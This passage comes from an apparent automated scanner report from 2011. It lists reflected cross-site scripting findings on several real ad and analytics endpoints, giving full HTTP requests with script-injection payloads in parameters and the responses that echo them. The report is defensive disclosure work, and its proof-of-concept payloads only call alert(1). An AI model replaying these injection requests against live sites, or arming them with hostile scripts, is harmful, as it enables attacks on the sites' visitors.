Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:39 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:39 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:39 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
tp://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426c4215"><script>alert(1)</script>69873abae82&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455
...[SNIP]...

4.33. http://as.chango.com/links/adunit/1.31759988192e+12 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the sig request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36d27"><script>alert(1)</script>1cc8286ed8d was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad9336d27"><script>alert(1)</script>1cc8286ed8d HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "a5b401f71e5148799a6f2423b07d4cd73d521042"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:54 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:54 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:54 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
ose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad9336d27"><script>alert(1)</script>1cc8286ed8d&cu=&dsi=None&clickURL=">
...[SNIP]...

4.34. http://as.chango.com/links/adunit/1.31759988192e+12 [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d371f"><script>alert(1)</script>a5fc9f67176 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broadd371f"><script>alert(1)</script>a5fc9f67176&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "70973571812951c51d2d4496427748c19bd89484"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:40 GMT
Content-Length: 2361
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:40 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroadd371f%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ea5fc9f67176; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:40 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broadd371f"><script>alert(1)</script>a5fc9f67176&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickUR
...[SNIP]...

4.35. http://as.chango.com/links/adunit/1.31759988192e+12 [stid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the stid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b637"><script>alert(1)</script>76dda13d31e was submitted in the stid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk1b637"><script>alert(1)</script>76dda13d31e&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "f33fc4f1aaa842e9b43349e461b453f890502a86"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:43 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:43 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk1b637%22%3E%3Cscript%3Ealert%281%29%3C/script%3E76dda13d31e%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:43 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B5866234.13;sz=300x250;ord=1317599983.43;click1=http://as.chango.com/links/click1317599983.45?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk1b637"><script>alert(1)</script>76dda13d31e&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259
...[SNIP]...

4.36. http://as.chango.com/links/adunit/1.31759988192e+12 [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c05"><script>alert(1)</script>f38714b81ab was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-livef3c05"><script>alert(1)</script>f38714b81ab&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "d3186fb91500f90491eca40b2def79ca69709121"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:50 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:50 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:50 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
d=1317599990.48;click1=http://as.chango.com/links/click1317599990.49?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-livef3c05"><script>alert(1)</script>f38714b81ab&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&
...[SNIP]...

4.37. http://as.chango.com/links/adunit/1.31759988192e+12 [wh parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the wh request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afd2d"><script>alert(1)</script>60dd599054f was submitted in the wh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300afd2d"><script>alert(1)</script>60dd599054f&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Content-Length: 588
Server: Chango RTB Server
ETag: "56e6cc8d003260b1dbdb5eff69d7d20a9c15541b"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:59:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:51 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:51 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml
...[SNIP]...
<body style="width: 300afd2d"><script>alert(1)</script>60dd599054fpx; height: 250px; margin: 0; padding: 0;">
...[SNIP]...

4.38. http://as00.estara.com/as/InitiateCall2.php [template parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /as/InitiateCall2.php

Issue detail

The value of the template request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80641'%3balert(1)//6c9e0c7792f was submitted in the template parameter. This input was echoed as 80641';alert(1)//6c9e0c7792f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /as/InitiateCall2.php?accountid=200106297609&template=85669580641'%3balert(1)//6c9e0c7792f&checklinkstatus=1&var2=912&var6=5860EEFA281121EC93852AEC182A3278&var7=912&var10=http%3A//travela.priceline.com/hotel/searchResults.do%3Fjsk%3D5463010a5064010a2011100300091519d011589950%26key%3Dgtapcnq5%26showDP%3Dy%26NYOPRedirNI%3Dnull HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEGFjLke6WJJNAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh98VLi0sK2lwYkF9cKjWXdEJSUbAVeUEmfbt9bc9z23--XB-7XiPa.b5v54oJuYNDTOS.bh.3a4Upc7bIKnpkFS4SWEdkFT0SOHgSjEhAsfc4xMhhn8PeTTwRI6yQqJNDDJI9yUb6oGKAvA.gPCGWjs5j3KkNQOUkiGRTzBGXFJFaIV3UC3CJhL2QLgYRT8QT9UQ9IU9okAwqRqropLRo5FRhpLRikF00kkCCuR2ik-JJj0qrGAQ9QSMkOY2CmnIMxndUDsqflNSCD9WDiwrqg0s2Tc7knWN6dY6Tc5yc1TuXForvp1gHEDGMkTZlNmG6IkxXhKmw4AsTjODqqGrkMYjL25VnOrHu.Q8_

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:23 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Length: 10170
Content-Type: application/x-javascript


var wv_available = true;
if (typeof(wv_available_vars) == 'undefined')
wv_available_vars = new Array();
wv_available_vars['85669580641';alert(1)//6c9e0c7792f'] = true;

var wv_vars=typeof(wv_vars)=="undefined"?new Array():wv_vars;wv_vars["ui_width"]="430";wv_vars["ui_height"]="378";wv_vars["ui_version"]="UI0001";wv_vars["ui_newwindow"]="yes";wv_vars["ui_ac
...[SNIP]...

4.39. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 3f294<script>alert(1)</script>398e6a34688 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=83f294<script>alert(1)</script>398e6a34688&c2=6036211&c3=&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:48 GMT
Date: Sun, 02 Oct 2011 23:52:48 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"83f294<script>alert(1)</script>398e6a34688", c2:"6036211", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.40. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 724b2<script>alert(1)</script>af07be835b7 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=&c6=&c10=724b2<script>alert(1)</script>af07be835b7 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:54 GMT
Date: Sun, 02 Oct 2011 23:52:54 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"", c6:"", c10:"724b2<script>alert(1)</script>af07be835b7", c15:"", c16:"", r:""});



4.41. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 66acc<script>alert(1)</script>97f36e4c3b7 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=603621166acc<script>alert(1)</script>97f36e4c3b7&c3=&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:49 GMT
Date: Sun, 02 Oct 2011 23:52:49 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"603621166acc<script>alert(1)</script>97f36e4c3b7", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.42. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 1371e<script>alert(1)</script>3fbe42d830d was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=1371e<script>alert(1)</script>3fbe42d830d&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:50 GMT
Date: Sun, 02 Oct 2011 23:52:50 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
